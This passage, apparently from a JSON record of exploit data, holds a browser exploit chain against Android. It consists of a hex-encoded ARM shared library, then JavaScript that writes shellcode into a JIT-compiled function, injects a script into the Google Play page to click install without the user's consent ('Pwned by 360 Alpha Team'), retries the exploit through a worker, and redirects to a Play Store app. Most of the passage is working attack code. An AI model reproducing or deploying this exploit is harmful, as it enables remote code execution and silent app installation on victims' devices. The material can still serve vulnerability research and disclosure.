700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000\";\nvar arrayBuffer = new ArrayBuffer(0x1000000);\nvar arrayBufferAddress = getObjAddr(arrayBuffer)-1;\nvar backingStoreAddress = read_uint32(arrayBufferAddress+4*4);\nvar args_address = backingStoreAddress+1024;\nfunction write_shellcode(dlsym_addr,buffer){\n //ldr r0,[pc,4]//0xe59f0004 \n //ldr r1,[pc,4]//0xe59f1004\n //b shellcode;//0xea000001\n //dlopen_addr//array_buffer_address\n //dlsym_addr\n //shellcode\n //var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];\n var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000];\n for(var i=0;i<stub.length;i++){\n globaldv[buffer/4+i]=stub[i];\n }\n\n shellcode = shellcode.concat([0,0,0,0]);\n for(var i=0;i<shellcode.length/4>>>0;i++){\n // u8arr[i+4*stub.length]=shellcode[i];\n globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]);\n }\n return stub.length*4+shellcode.length;\n}\n\nfunction xss_code(){\n //alert(navigator.userAgent);\n //alert(document.cookie);\n var i1=setInterval(function(){\n if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){\n console.log(\"wait load complete\");\n return;\n }\n clearInterval(i1);\n var i2=setInterval(function(){\n document.getElementsByClassName(\"price buy id-track-click\")[0].click();\n var installButton = document.getElementById(\"purchase-ok-button\");\n if(installButton == null)\n return;\n installButton.click();\n document.write(\"<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>\");\n clearInterval(i2);\n setTimeout(function(){\n window.open(\"intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end\");\n },26000);\n },500);\n },500);\n}\n\nvar js_str=\"\\n\"+xss_code.toString()+\"xss_code();\\n\";\n//var backup_arr = backup_original_code(huge_func_code_entry);\nvar writed_len = write_shellcode(dlsym_addr,huge_func_code_entry);\nvar args_view = new DataView(arrayBuffer,1024,100);\nvar so_file_view = new DataView(arrayBuffer,4096);\nvar js_view = new DataView(arrayBuffer,0x100000);\nargs_view.setUint32(0,dlsym_addr+0xc,true);\nargs_view.setUint32(4,dlsym_addr,true);\nargs_view.setUint32(8,huge_func_code_entry,true);\nargs_view.setUint32(12,writed_len,true);\nargs_view.setUint32(16,backingStoreAddress+4096,true);\nargs_view.setUint32(20,so_str.length/2,true);\nargs_view.setUint32(24,backingStoreAddress+0x100000,true);\nargs_view.setUint32(28,js_str.length,true);\nprint(\"length is \"+so_str.length);\nfor(var i=0;i<so_str.length;i+=2){\n var value = so_str.substr(i,2);\n value = \"0x\"+value;\n so_file_view.setUint8(i/2,parseInt(value));\n}\nfor(var i=0;i<js_str.length;i++){\n js_view.setUint8(i,js_str.charCodeAt(i));\n}\n\nprint(\"begin execute shellcode\");\nhuge_func({});\n\nprint(\"done\");\npostMessage(true);\n//prevent arrayBuffer to be released\nwhile(1){}\n\n}\n//main world\nfunction print(){\n console.log.apply(null,arguments);\n document.write('<p >');\n document.write.apply(document,arguments);\n document.write(\"<p>\");\n}\n\n// Build a worker from an anonymous function body\nvar blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) );\n\nvar worker;\nvar exploitSucc = false;\nvar count = 0;\nfunction startExploit(){\n print(\"worker thread is started\");\n worker = new Worker( blobURL );\n count++;\n worker.onmessage = function(e){\n print(\"exploit result is \"+e.data);\n exploitSucc = e.data;\n if(exploitSucc==false){\n startExploit();\n return;\n }\n var end = +new Date();\n print(\"time diff is \"+(end-begin)/1000);\n //top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android';\n top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner';\n }\n}\nvar begin = +new Date();\nstartExploit();\n\nvar savedCount = 0;\nvar hangMonitor = setInterval(function (){\n if(exploitSucc==true){\n clearInterval(hangMonitor);\n }else{\n if(savedCount==count){//maybe hang\n print(\"worker maybe hange\");\n worker.terminate();\n startExploit();\n }else{\n print(\"worker is normal\");\n savedCount = count;\n }\n }\n},10000);\n//URL.revokeObjectURL( blobURL );\n\n\n</script>\n</html>", "cvss": {"score": 0.0, "vector": "NONE"}}]}